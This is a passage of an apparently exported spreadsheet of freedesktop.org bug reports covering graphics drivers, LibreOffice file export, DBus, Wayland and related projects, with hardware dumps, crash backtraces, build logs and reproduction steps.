01:00.0 VGA compatible controller: Unknown device 0001:7188 (prog-if 00 [VGA controller])
        Subsystem: Samsung Electronics Co Ltd Unknown device c515
        Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
        Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
        Latency: 0 Cache Line Size: 32 bytes
        Interrupt: pin A routed to IRQ 5
        Region 0: Memory at d0000000 (32-bit prefetchable) [size=128M]
        Region 1: I/O ports at 9000 [size=256]
        Region 2: Memory at d8000000 (32-bit non-prefetchable) [size=64K]
        [virtual] Expansion ROM at d8020000 [disabled] [size=128K]
        Capabilities: [50] Power Management version 2
                Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
                Status: D0 PME-Enable- DSel=0 DScale=0 PME-
        Capabilities: [58] Express (v1) Legacy Endpoint MSI 00
                DevCap: MaxPayload 128 bytes PhantFunc 0 Latency L0s &lt;4us L1 unlimited
                        ExtTag+ AttnBtn- AttnInd- PwrInd- RBE- FLReset-
                DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported-
                        RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+
                        MaxPayload 128 bytes MaxReadReq 128 bytes
                DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend-
                LnkCap: Port #0 Speed 2.5GT/s Width x16 ASPM L0s L1 Latency L0 &lt;64ns L1 &lt;1us
                        ClockPM- Suprise- LLActRep- BwNot-
                LnkCtl: ASPM Disabled RCB 64 bytes Disabled- Retrain- CommClk-
                        ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt-
                LnkSta: Speed 2.5GT/s Width x16 TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt-
        Capabilities: [80] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable-
                Address: 0000000000000000  Data: 0000
PS: this videocard is installed in SAMSUNG NP-R25F000/SEK notebook.</t>
  </si>
  <si>
    <t>pavel5</t>
  </si>
  <si>
    <t>DRI-80208</t>
  </si>
  <si>
    <t>[all]igt/gem_userptr_blits fails with OOM killer</t>
  </si>
  <si>
    <t>Created attachment 101330
dmesg
==System Environment==
--------------------------
Regression: No. 
It's new case
Non-working platforms: ILK SNB IVB HSW
==kernel==
--------------------------
origin/drm-intel-nightly: fff6c5111af7356d3815521f597959554e7bc1cc(fails)
    drm-intel-nightly: 2014y-06m-18d-00h-49m-52s integration manifest
origin/drm-intel-next-queued: 27b6c122512ca30399bb1b39cc42eda83901f304(fails)
    drm/i915/chv: Ack interrupts before handling them (CHV)
origin/drm-intel-fixes: 223a6f2b975ab35d93270ea1d4fb6e0ac6b27fe6(fails)
    drm/i915/bdw: remove erroneous chv specific workarounds from bdw code
==Bug detailed description==
-----------------------------
igt/gem_userptr_blits unable to exist
Case list:
igt/gem_userptr_blits/forked-sync-interruptible
igt/gem_userptr_blits/forked-sync-mempressure-interruptible
igt/gem_userptr_blits/forked-sync-mempressure-normal
igt/gem_userptr_blits/forked-sync-multifd-interruptible
igt/gem_userptr_blits/forked-sync-multifd-mempressure-interruptible
igt/gem_userptr_blits/forked-sync-multifd-mempressure-normal
igt/gem_userptr_blits/forked-sync-swapping-interruptible
igt/gem_userptr_blits/forked-sync-swapping-mempressure-interruptible
igt/gem_userptr_blits/forked-sync-swapping-mempressure-normal
igt/gem_userptr_blits/forked-sync-swapping-multifd-interruptible
igt/gem_userptr_blits/forked-sync-swapping-multifd-mempressure-interruptible
igt/gem_userptr_blits/forked-sync-swapping-multifd-mempressure-normal
igt/gem_userptr_blits/forked-unsync-multifd-mempressure-normal
igt/gem_userptr_blits/forked-unsync-swapping-mempressure-normal
igt/gem_userptr_blits/forked-unsync-swapping-multifd-mempressure-interruptible
igt/gem_userptr_blits/forked-unsync-swapping-multifd-mempressure-normal
igt/gem_userptr_blits/swapping-normal-sync
igt/gem_userptr_blits/swapping-sync-interruptible
igt/gem_userptr_blits/swapping-unsync-interruptible
igt/gem_userptr_blits/swapping-unsync-normal
Output:
[root@x-hsw27 tests]# time ./gem_userptr_blits --run-subtest forked-sync-interruptible
IGT-Version: 1.7-g1b1f4b1 (x86_64) (Linux: 3.15.0-rc8_drm-intel-fixes_223a6f_20140618+ x86_64)
Aperture size is 2048 MiB
Total RAM is 7669 MiB
Testing unsynchronized mappings...
Testing synchronized mappings...
^C
real    18m10.336s
user    0m4.631s
sys     97m46.113s
==Reproduce steps==
---------------------------- 
1. ./gem_userptr_blits --run-subtest forked-sync-interruptible</t>
  </si>
  <si>
    <t>LIBREOFFICE-76466</t>
  </si>
  <si>
    <t>Save as a different file format is now extremely awkward when using GTK3 dialog.</t>
  </si>
  <si>
    <t>This is a regression caused by Bug 74064.
While in Gnome 3 
1. Open an existing ods document
2. Go to File -&gt; Save As and make sure you have the GTK's native file dialog open.
3. Change the format type to anything other than ODS say Microsoft Excel (.xls).
4. Hit Save.
It still tries to save the document as the original ods document.</t>
  </si>
  <si>
    <t>PIXMAN-16735</t>
  </si>
  <si>
    <t>pixman needs uninstalled.pc file</t>
  </si>
  <si>
    <t>Created attachment 17702
Add uninstalled.pc.in file.
We group modules together on Solaris to make meta packages.
Our SUNWgnome-base-libs package contains cairo pixman glib gtk+ and more.
As pixman is not installed when pixman is built an uninstalled.pc file is needed. See attached patch.
This is for pixman 0.11.6.</t>
  </si>
  <si>
    <t>OPENCLIPART.ORG-4187</t>
  </si>
  <si>
    <t>User registration / login / session mechanism for the website.</t>
  </si>
  <si>
    <t>As mentioned in bug 4134 we need a mechanism that can let a user log in
and then track who is logged in (via a session cookie) and other bits of
information (in a database probably).
For the database we could either ask the fdo people to hook us up with
one in whatever RDBMS they use or we could go with DBD::Trini or SQLite
or something along those lines or in a pinch flat files.  Then we can
wrap a couple of easy Class::DBI classes around it and use it site-wide.
Basically what goes on conceptually is this:
1. Upon visiting the site initially the user will be anonymous
2. If the user logs in (by entering a username and password into
   a form that goes to a login cgi which checks against the db)
   then two things happen:
   2A:  A record is created in the DB in a sessions table that
        holds the user id possibly some other info (such as an
        IP address and expiration datetime) and a pseudorandom
        unique session ID string.
   3A:  The session ID string is sent to the user in a cookie.
3. Any page that wants to know if the user is logged in can check
   the cookie look up the session ID string in the database and
   get the user id from the record.  The user id is then also a key 
   into the users table and possibly some other tables.
4. A cron job can periodically delete expired sessions from the
   sessions table also when the user logs in the login script
   could clear out any old sessions from that user before
   adding the new one.
5. When a new user wants to create an account we ask them for
   (among other things) an email address and the account is
   created with an inactive status and a datestamp and an email
   is sent to the provided address containing a magic token
   which is also stored in the newly created user record.
   The user retrieves the email and feeds the magic token from
   it into the account-activation form proving the address is 
   valid and the account is then activated so that the user
   can log in.  A captcha could also be employed if we have
   problems with bogus accounts but I suspect that will not
   be necessary at least for now.
The advantage of getting an RDBMS account is that PHP portions of the site
could also access it whereas with something like Trini that would be
rather harder to do directly.
Ways this would be used on the site are many and varied but some examples:
 * The upload clipart form could auto-prefill the author portions
   (both author name and URI) the user would still be able to edit 
   the values before submitting.
 * If we offer a choice of stylesheets we can store the user's preference
   and always use it when the user logs in.  We could also store preferences
   for other things such as which sidebar sections to show and stuff.
 * When the DMS is in place we can make it so that logged-in users
   can update their own clipart and/or its metadata.
 * Also with the DMS in place we can make it so that users can leave
   feedback about specific items of clipart anyone would be able to
   view this feedback and the author can be notified next time he logs
   in.  Private feedback for just the author is also a possibility
   if that is a desired feature.
 * With the DMS in place we can add an interface whereby users can 
   help with categorization and a given user's contributions in this 
   regard can be tracked so that if a vandalism problem develops they 
   can be reverted.</t>
  </si>
  <si>
    <t>galionlibrary</t>
  </si>
  <si>
    <t>XORG-24753</t>
  </si>
  <si>
    <t>[i915] Occasional X freezes / GPU lockups with driver version 2.9.0</t>
  </si>
  <si>
    <t>Logs from driver version 2.9.0 as requested in bug 23116</t>
  </si>
  <si>
    <t>DBUS-16166</t>
  </si>
  <si>
    <t>[patch] Add DBusServer-using test cases</t>
  </si>
  <si>
    <t>Hi I was looking at Scott's patches but was uncomfortable about the fact that there is very little coverage of DBusServer (outside of the bus itself) and dbus_shutdown() right now.  
Attached are 4 patches.  
The first separates the test-utils.[ch] into a separate noinst libtool library and creates a test-shutdown.c test that calls dbus_shutdown and also reinitializes.  
The second patch adds utility functions for setting up a DBusServer with DBusLoop matching the code for connections.
The third patch is trivial changes for the first which if I knew Git better I would have merged.
The fourth patch finally uses this infrastructure to create a PrivServer test which excercises DBusServer and dbus_shutdown and we can start to reproduce the problems Scott is hitting.</t>
  </si>
  <si>
    <t>LIBREOFFICE-81532</t>
  </si>
  <si>
    <t>No icon themes are found when symlinks are used in config directory</t>
  </si>
  <si>
    <t>The Debian maintainer for LibreOffice approached me with an error in LO 4.3.0.x
(cf. https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=752531  search for icon selection)
When the config directory contains symlinks instead of real files no icon themes are found and the program closes with an error message when going to the options and clicking on view.
An example for a symlink looks as follows.
/usr/lib/libreoffice/share/config/images.zip -&gt; ../../../../share/libreoffice/share/config/images.zip</t>
  </si>
  <si>
    <t>LIBREOFFICE-66781</t>
  </si>
  <si>
    <t>FILESAVE: DOCX Export shows hidden bullets after saved by LO</t>
  </si>
  <si>
    <t>Created attachment 82282
DOCX containing hidden bullets
Problem description: 
When LO opens a DOCX that has 'hidden' bullets in it (bullets with level 0) - after saved by LO to a NEW.DOCX - the bullets are visible in Word.
Steps to reproduce:
1. Load the attached DOCX in LO
2. Save as a NEW.DOCX
3. Load the NEW.DOCX in Word
4. The bullets are visible
Current behavior:
In the NEW.DOCX file - Bullets are visible
Expected behavior:
In the NEW.DOCX file - Bullets should be hidden
Operating System: All
Version: 4.2.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>UPOWER-88950</t>
  </si>
  <si>
    <t>iPhone battery level doesn't work when plugged after UPower is started</t>
  </si>
  <si>
    <t>We're too quick and when:
        /* Connect to the device */
        if (idevice_new (&amp;dev uuid) != IDEVICE_E_SUCCESS) {
is called libimobiledevice tells us usbmuxd doesn't know that device yet.
Adding a sleep() works-around the problem but we should be postponing the rest of the function instead.</t>
  </si>
  <si>
    <t>XORG-47280</t>
  </si>
  <si>
    <t>vmware driver causes segfault on startup</t>
  </si>
  <si>
    <t>Created attachment 58372
Core image of crashed server.
The vmware driver included in the 1.12.0 X distribution causes a segfault on startup.  I originally posted some details at https://bugs.archlinux.org/task/28882 but the gist of it is that vmware_drv.so loads libvgahw.so as a dependency and in vgaHWSaveColormap() function pointers are dereferenced off of the passed-in vgaHWPtr that are NULL.  The particular one that causes the crash is hwp-&gt;writeDacMask at hw/xfree86/vgahw/vgaHW.c:1075.
Here's a stacktrace collected from gdb:
Program received signal SIGSEGV Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) i thr
Id Target Id Frame
* 1 Thread 0x7ffff7fc9880 (LWP 1295) Xorg 0x0000000000000000 in ?? ()
(gdb) bt
#0 0x0000000000000000 in ?? ()
#1 0x00007ffff3bfdea1 in vgaHWSaveColormap () from /usr/lib/xorg/modules/libvgahw.so
#2 0x00007ffff3bff7ad in vgaHWSave () from /usr/lib/xorg/modules/libvgahw.so
#3 0x00007ffff4415043 in ?? () from /usr/lib/xorg/modules/drivers/vmware_drv.so
#4 0x00000000004735cc in InitOutput ()
#5 0x0000000000422c0d in ?? ()
#6 0x00007ffff61df38d in __libc_start_main () from /lib/libc.so.6
#7 0x00000000004230cd in _start ()
(gdb) 
I've also attached a core dump from the current ArchLinux x86_64 distribution.</t>
  </si>
  <si>
    <t>nullptr</t>
  </si>
  <si>
    <t>DBUS-13387</t>
  </si>
  <si>
    <t>Problem compiling dbus 1.2.1</t>
  </si>
  <si>
    <t># make
make  all-recursive
make[1]: Entering directory `/tmp/dbus-1.1.2'
Making all in dbus
make[2]: Entering directory `/tmp/dbus-1.1.2/dbus'
make  all-am
make[3]: Entering directory `/tmp/dbus-1.1.2/dbus'
/bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I.. -I.. -I..  -DDBUS_COMPILATION -DDBUS_MACHINE_UUID_FILE=\/usr/local/var/lib/dbus/machine-id\ -DDBUS_SYSTEM_CONFIG_FILE=\/usr/local/etc/dbus-1/system.conf\ -DDBUS_SESSION_CONFIG_FILE=\/usr/local/etc/dbus-1/session.conf\    -ffunction-sections -fdata-sections -s -O3 -march=i686 -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wfloat-equal -Wsign-compare -Wdeclaration-after-statement -fno-common -fPIC -ansi -D_POSIX_C_SOURCE=199309L -D_BSD_SOURCE -pedantic -MT dbus-sysdeps-unix.lo -MD -MP -MF .deps/dbus-sysdeps-unix.Tpo -c -o dbus-sysdeps-unix.lo dbus-sysdeps-unix.c
 gcc -DHAVE_CONFIG_H -I. -I.. -I.. -I.. -DDBUS_COMPILATION -DDBUS_MACHINE_UUID_FILE=\/usr/local/var/lib/dbus/machine-id\ -DDBUS_SYSTEM_CONFIG_FILE=\/usr/local/etc/dbus-1/system.conf\ -DDBUS_SESSION_CONFIG_FILE=\/usr/local/etc/dbus-1/session.conf\ -ffunction-sections -fdata-sections -s -O3 -march=i686 -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wfloat-equal -Wsign-compare -Wdeclaration-after-statement -fno-common -fPIC -ansi -D_POSIX_C_SOURCE=199309L -D_BSD_SOURCE -pedantic -MT dbus-sysdeps-unix.lo -MD -MP -MF .deps/dbus-sysdeps-unix.Tpo -c dbus-sysdeps-unix.c  -fPIC -DPIC -o .libs/dbus-sysdeps-unix.o
In file included from ../dbus/dbus-types.h:31
                 from dbus-internals.h:33
                 from dbus-sysdeps-unix.c:25:
../dbus/dbus-arch-deps.h:36: warning: ISO C90 does not support `long long'
../dbus/dbus-arch-deps.h:37: warning: ISO C90 does not support `long long'
In file included from dbus-sysdeps-unix.c:25:
dbus-internals.h:96:27: warning: anonymous variadic macros were introduced in C99
dbus-sysdeps-unix.c: In function `_dbus_connect_tcp_socket':
dbus-sysdeps-unix.c:783: error: `AI_ADDRCONFIG' undeclared (first use in this function)
dbus-sysdeps-unix.c:783: error: (Each undeclared identifier is reported only once
dbus-sysdeps-unix.c:783: error: for each function it appears in.)
dbus-sysdeps-unix.c: In function `_dbus_listen_tcp_socket':
dbus-sysdeps-unix.c:886: error: `AI_ADDRCONFIG' undeclared (first use in this function)
dbus-sysdeps-unix.c: In function `_dbus_read_credentials_socket':
dbus-sysdeps-unix.c:1220: warning: pointer targets in passing arg 5 of `getsockopt' differ in signedness
dbus-sysdeps-unix.c: At top level:
dbus-sysdeps-unix.c:1747: error: syntax error before dbus_int32_t
dbus-sysdeps-unix.c:1750: warning: no previous prototype for 'atomic_exchange_and_add'
make[3]: *** [dbus-sysdeps-unix.lo] Error 1
make[3]: Leaving directory `/tmp/dbus-1.1.2/dbus'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/tmp/dbus-1.1.2/dbus'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/tmp/dbus-1.1.2'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>pierre42d</t>
  </si>
  <si>
    <t>LIBREOFFICE-79710</t>
  </si>
  <si>
    <t>An .ods file gets an error while being started</t>
  </si>
  <si>
    <t>Created attachment 100500
gdbtrace.log file
Loading of one Calc file results in this error message:
com.sun.star.uno.RuntimeExceptionScriptProtocolHandler::createScriptProvider()  Unable to obtain document content factory!
LO crashes when the error message is closed when restarted it goes to document recovery which also fails. After installing libreoffice-dbg the symptoms are a bit different. LO does not crash when the error message is closed but when the file itself is closed. The gdbtrace.log file is attached.
This happens only on one particular file. Said file opened properly under LO 4.1.?.</t>
  </si>
  <si>
    <t>rebelxtuser</t>
  </si>
  <si>
    <t>MESA-64307</t>
  </si>
  <si>
    <t>[ivb] *ERROR* Hangcheck timer elapsed... GPU hung (after resume)</t>
  </si>
  <si>
    <t>Created attachment 78972
xorg.log
# uname -a
Linux anemoi 3.9.0-1-desktop #1 SMP PREEMPT Tue Apr 30 07:09:32 UTC 2013 (457cceb) x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>LIBREOFFICE-73872</t>
  </si>
  <si>
    <t>File Corruption - Issue with Embedded binary object and chart in Footer.</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Open the file in LibreOffice
2. Click File -&gt; Save As (Microsoft Word 2007/2010 (.docx))
3. Open saved file in MS Office
Expected:
File should open without any error.
Actual:
File corrupt dialog is shown</t>
  </si>
  <si>
    <t>XORG-3850</t>
  </si>
  <si>
    <t>i830 shadow support uses symbols built only in DRI when DRI not built</t>
  </si>
  <si>
    <t>In the current CVS head version of the i810 driver i830_driver.c calls
      xf86LoaderReqSymLists(I810shadowFBSymbols NULL)
outside of #ifdef XF86DRI but I810shadowSymbols in i810_driver.c is only
defined inside #ifdef XF86DRI leading to failures when built without DRI.
(II) Loading /usr/X11/lib/modules/drivers/i810_drv.so
dlopen: ld.so.1: Xorg: fatal: relocation error: file /usr/X11/lib/modules/driver
s/i810_drv.so: symbol I810shadowFBSymbols: referenced symbol not found
(EE) Failed to load /usr/X11/lib/modules/drivers/i810_drv.so
(II) UnloadModule: i810
(EE) Failed to load module i810 (loader failed 7)</t>
  </si>
  <si>
    <t>PORTLAND-33094</t>
  </si>
  <si>
    <t>mimetype support for xdg-mime (generic)</t>
  </si>
  <si>
    <t>I can't find an existing bug report for this but anyway. Here's a patch which makes xdg-mime try the mimetype command before file when using the generic method. So that shared-mime-info is used.</t>
  </si>
  <si>
    <t>XORG-1478</t>
  </si>
  <si>
    <t>Selection.c damages user error handler function</t>
  </si>
  <si>
    <t>It looks like under certain conditions a user error handler routine set by 
XSetErrorHandler can be effectively canceled from inside of Xt/Selection.c.
The place to suspect is the loop in the SelectionRequest case of 
HandleSelectionEvents function. Under certain conditions there can be several 
two calls to EndProtectedSection after single StartProtectedSection. Since 
EndProtectedSection zeroes the global oldErrorHandler variable the second 
call to EndProtectedSection restores the default error procedure instead of 
user's one.
Probably there exist more than one problematic code fragments.
(Checked in 6.6 and 6.8.1 sources).</t>
  </si>
  <si>
    <t>mikets</t>
  </si>
  <si>
    <t>LIBREOFFICE-81008</t>
  </si>
  <si>
    <t>DOCX export: first and subsequent header problems</t>
  </si>
  <si>
    <t>Created attachment 102380
text with first-page header 'Sermon St Gregory's Offchurch' that won't let itself be altered.
Problem description:   I previously reported first/subsequent header problems (in May) with the previous release of LO: first header appearing on second page as well with associated forced new page and reformatting of the paragraph going over the page change.
This seems to have been fixed but now the first header in my template won't let itself be overwritten.  I have changed the header and saved closed the doc and found the original version when I reopened.  I have done this twice.
Steps to reproduce:
1. ....  Open document attached
2. ....  Change text in first page header
3. ....  Save and close
Current behavior:  On reopening the original text of header reappears
Expected behavior:  the altered text should appear
Operating System: Mac OS X
Version: 4.1.6.2 release</t>
  </si>
  <si>
    <t>florinequals</t>
  </si>
  <si>
    <t>DBUS-43675</t>
  </si>
  <si>
    <t>clients can't detect the session bus address on windows when using nonce-tcp transport.</t>
  </si>
  <si>
    <t>issue :
1.) dbus-launch does nothing but start the debus-deamon it does not print the session details 
2.) nonefile is a dynamic entry which is created per deamon instance so there is no way we can pre determine this.
So the only way now is to run dbus-daemon in verbose mode and copy the session bus address manually by hand and set it so that clients can connect to it.. so we need an automated way which exposes the session bus details on windows so that the clients can use it.</t>
  </si>
  <si>
    <t>DRI-85924</t>
  </si>
  <si>
    <t>[hsw DP-to-DVI] DP hot plug fails if booted without Monitor Attached</t>
  </si>
  <si>
    <t>tprevite</t>
  </si>
  <si>
    <t>oliver.grafe</t>
  </si>
  <si>
    <t>DRI-30069</t>
  </si>
  <si>
    <t>[I915] Arrandale unable to change resolution stuck in one resolution mode.</t>
  </si>
  <si>
    <t>BIOS Version: A03
Platform: ROTH-E3-C1
CPU: Arrandale
VGA: Intel UMA
Audio : Intel Corporation Device 3b57
Summary : No options in drop down menu for change in Resolution
Steps to reproduce : Systems &gt; Preferences &gt; Monitors
Expected result : Options in drop down menu to change resolution.
Actual result : No options in drop down menu to change resolution.</t>
  </si>
  <si>
    <t>manoj.iyer</t>
  </si>
  <si>
    <t>LIBREOFFICE-69362</t>
  </si>
  <si>
    <t>Lightproof Portuguese: Rule expression as the suggestion</t>
  </si>
  <si>
    <t>Created attachment 85835
The problem itself
Problem description: I was writing a homework and LibreOffice Writer tried to correct my sentence. But instead of showing the right way the suggestion looks like a peace of code os the program and correcting it when clicking on the suggestion makes that text appear in the place of the wrong sentence.
Steps to reproduce:
1. Just write down Ã  servidores (portuguese) and wait for it to underline the wront accentuation.
Current behavior: Showing that strange line in the attached picture.
Expected behavior: Correct the grammar error (in other cases it does it very well!)
Operating System: Windows 8
Version: 4.1.1.2 release</t>
  </si>
  <si>
    <t>g7.galli96</t>
  </si>
  <si>
    <t>XORG-14437</t>
  </si>
  <si>
    <t>[855GM 2.2.0.90] regression: screen flickering in green</t>
  </si>
  <si>
    <t>Created attachment 14228
xorg.conf
Package: xserver-xorg-video-intel
Version: 2:2.2.0.90-3 (Debian Sid)
kernel: 2.6.24-1-686
Chip: Intel Corporation 82852/855GM Integrated Graphics Device
I sporadically get some green flickering after upgrading to version 2.2.0.90-3
Seems to be a regression since there is no flickering when using xserver-xorg-video-intel_2.2.0-1+exa_i386.deb or xserver-xorg-video-intel_2.2.0+git20080107-1_i386.deb
Regards
Jos van Wolput</t>
  </si>
  <si>
    <t>DRI-45366</t>
  </si>
  <si>
    <t>Radeon gpu lockups</t>
  </si>
  <si>
    <t>Created attachment 56286
GPU locksups log
I'm getting gpu lockups every now and then. More likely during with heavy OpenGL usage but Compiz is enough sometimes. I can switch to console and kill the application and usually get a functioning system back.
Setup:
Intel Core i5 2500k
Radeon 6850
Ubuntu 11.10
Kernel: Ubuntu 3.2.0-7.13-generic 3.2.0-rc7
3D stack from xorg-edgers ppa</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-12237</t>
  </si>
  <si>
    <t>A project to gather IM libraries and share the reverse engineering effort on closed protocols.</t>
  </si>
  <si>
    <t>This is about a new project that I would like to see come up
under the fd.o banner.
I'm part of the pymsn project. Our goal is to provide a full
implementation of the latest MSN Messenger protocol for
interoperability purpose. So far the project is kind of hosted by
Telepathy since it's the base library for telepathy-butterfly but this
is clearly not the place where it should be.
Based on that observation we would like to build an OpenIM initiative.
Such a project would aim to the gathering of people working on the
opening of closed instant messaging protocols. 
One of the most important goal in this would to have centralized
shared documentation on protocols and a clear follow up of features
implemented in each project.</t>
  </si>
  <si>
    <t>MESA-81584</t>
  </si>
  <si>
    <t>piglit.spec.!opengl 1_1.lineloop fails</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: SNB
Libdrm:		(master)libdrm-2.4.54-19-gc0b34dca2632a774249cfa3b969c3f7ce9df33e1
Mesa:		(10.2)e7310313725142cf536179d4d918db2c20438765
Xserver:	(server-1.15-branch)xorg-server-1.15.2
Xf86_video_intel:(master)2.99.912-233-gf33d44f41ef0f287375b7a6b1c117abff5a23b19
Libva:		(master)c61d8c6ce9ffc27320e9e177c1e1123d5f1b5014
Libva_intel_driver:(master)c5cb17ea86f0065a939d3636dd26651c93d497c8
kernel: drm-intel-fixes/c6930992948adf0f8fc1f6ff1da51c5002a2cf95
Bug detailed description:
---------------------------
New case spec_OpenGL_1.1_lineloop fails on all platforms with mesa 10.2 and master branch.
output:
Probe color at (15060)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 1.000000
PIGLIT: {result: fail }
Reproduce steps:
---------------------------- 
1. xinit
2. bin/lineloop -auto</t>
  </si>
  <si>
    <t>DRI-31355</t>
  </si>
  <si>
    <t>[945] Spurious TV detection</t>
  </si>
  <si>
    <t>Created attachment 40009
Xorg.0.log
System environment:
Chipset: 945GME
Arch: i686
libdrm: 2.4.22-1.fc14
mesa-dri: 7.9-1.fc14
xorg: 1.9.0-15.fc14
intel-drv: 2.12.0-6.fc14
kernel: 2.6.35.6-45.fc14
distro: Fedora 14
machine: Aaeon AEC-6860-C6 Embedded Controller: C2D 1.6GHz CPU(T5500)
display connector: VGA
Reproducible: 100%
Steps to reproduce:
1. Install Fedora 14 without KDE GNOME - only X Window system
2. Log in on tty
3. Run startx
Result: (EE) intel(0): Failed to set tiling on frontbuffer.
waiting for X server to shut down
Starting the X server fails.</t>
  </si>
  <si>
    <t>joacim.olex</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-53234</t>
  </si>
  <si>
    <t>new account for Patrick Ohly (SyncEvolution)</t>
  </si>
  <si>
    <t>Created attachment 65267
public ssh key
Please create an account for me so that I can push source code changes to the (to be created) SyncEvolution repos. See bug #46776.
I typically use pohly as user name but I'm happy to use whatever other convention is used in fdo.</t>
  </si>
  <si>
    <t>XORG-6460</t>
  </si>
  <si>
    <t>Linker-Fix for Xgl (with ldflag --as-needed)</t>
  </si>
  <si>
    <t>ld supports a flag --as-needed that links only against libs really required.
It requires the order of linked elements to be static objects before dynamic 
objects. Attached oneliner Patch to fix Xgl.</t>
  </si>
  <si>
    <t>WAYLAND-51054</t>
  </si>
  <si>
    <t>[bug] Clipboard crash</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) Open weston-terminal
2) Ctrl+Shift+C
3) Close the terminal
4) Open a new weston-terminal
5) Ctrl+Shift+C
This crashes weston. It makes no difference if text is selected or not. Here is the bt:
(gdb) bt full
#0  0x00000000007b5350 in ?? ()
No symbol table info available.
#1  0x000000000041059c in wl_signal_emit (signal=0x757a50 data=0x757a20) at /home/user/wayland/include/wayland-server.h:166
        l = 0x8633c0
        next = 0x7c4268
#2  0x000000000041062b in clipboard_source_unref (source=0x757a20) at clipboard.c:63
        s = 0x7b16c0
#3  0x0000000000410ba9 in clipboard_set_selection (listener=0x7b7198 data=0x7c4220) at clipboard.c:228
        clipboard = 0x7b7190
        seat = 0x7c4220
        source = 0x788490
        mime_types = 0x7b16f0
        p = {7909432 0}
#4  0x00007ffff6e48643 in wl_signal_emit (signal=0x7c4280 data=0x7c4220) at wayland-server.h:166
        l = 0x7b7198
        next = 0x7c4280
#5  0x00007ffff6e49333 in wl_seat_set_selection (seat=0x7c4220 source=0x788490 serial=66) at data-device.c:392
        data_device = 0x757ed0
        offer = 0x7b16c0
        focus = 0x744a90
#6  0x00007ffff6e493a5 in data_device_set_selection (client=0x7b5350 resource=0x757ed0 source_resource=0x788490 serial=66) at data-device.c:411
No locals.
#7  0x00000032a7205d64 in ffi_call_unix64 () from /usr/lib64/libffi.so.5
No symbol table info available.
#8  0x00000032a7205785 in ffi_call () from /usr/lib64/libffi.so.5
No symbol table info available.
#9  0x00007ffff6e4c059 in wl_closure_invoke (closure=0x857540 target=0x757ed0 func=0x7ffff6e49369  data=0x7b5350) at connection.c:773
        result = 0
#10 0x00007ffff6e45e8a in wl_client_connection_data (fd=24 mask=1 data=0x7b5350) at wayland-server.c:253
        client = 0x7b5350
        connection = 0x83b1c0
        resource = 0x757ed0
        object = 0x757ed0
        closure = 0x857540
        message = 0x7ffff725bc98
        p = {8 1048577}
        opcode = 1
        size = 16
        cmask = 1
        len = 0
#11 0x00007ffff6e49792 in wl_event_source_fd_dispatch (source=0x7b3020 ep=0x7fffffffdc70) at event-loop.c:79
        fd_source = 0x7b3020
        mask = 1
#12 0x00007ffff6e4a132 in wl_event_loop_dispatch (loop=0x61b9c0 timeout=-1) at event-loop.c:410
        ep = {{events = 1 data = {ptr = 0x7b3020 fd = 8073248 u32 = 8073248 u64 = 8073248}} {events = 4 data = {ptr = 0x7b3020 fd = 8073248 u32 = 8073248 u64 = 8073248}} {events = 0 data = {
              ptr = 0x0 fd = 0 u32 = 0 u64 = 0}} {events = 0 data = {ptr = 0x7ffff725d858 fd = -148514728 u32 = 4146452568 u64 = 140737339840600}} {events = 4294967295 data = {ptr = 0x1 fd = 1 
              u32 = 1 u64 = 1}} {events = 0 data = {ptr = 0x0 fd = 0 u32 = 0 u64 = 0}} {events = 4142144365 data = {ptr = 0xf705285800007fff fd = 32767 u32 = 32767 u64 = 17799677460674019327}} {
            events = 1 data = {ptr = 0x7ffff725d000 fd = -148516864 u32 = 4146450432 u64 = 140737339838464}} {events = 0 data = {ptr = 0x402a2d00000000 fd = 0 u32 = 0 u64 = 18060771271376896}} {
            events = 0 data = {ptr = 0x0 fd = 0 u32 = 0 u64 = 0}} {events = 2765821696 data = {ptr = 0xffffffff00000032 fd = 50 u32 = 50 u64 = 18446744069414584370}} {events = 0 data = {
              ptr = 0x405c40 fd = 4217920 u32 = 4217920 u64 = 4217920}} {events = 4142141424 data = {ptr = 0xf725d50000007fff fd = 32767 u32 = 32767 u64 = 17808874497483243519}} {events = 32767 
            data = {ptr = 0x618828 fd = 6391848 u32 = 6391848 u64 = 6391848}} {events = 0 data = {ptr = 0xf6e40cd800000000 fd = 0 u32 = 0 u64 = 17790358549872771072}} {events = 32767 data = {
              ptr = 0x7ffff725d500 fd = -148515584 u32 = 4146451712 u64 = 140737339839744}} {events = 4294967295 data = {ptr = 0xa460e60400000000 fd = 0 u32 = 0 u64 = 11844719924838662144}} {
            events = 50 data = {ptr = 0x7fff00000001 fd = 1 u32 = 1 u64 = 140733193388033}} {events = 0 data = {ptr = 0x21142000000000 fd = 0 u32 = 0 u64 = 9310801902960640}} {events = 0 data = {
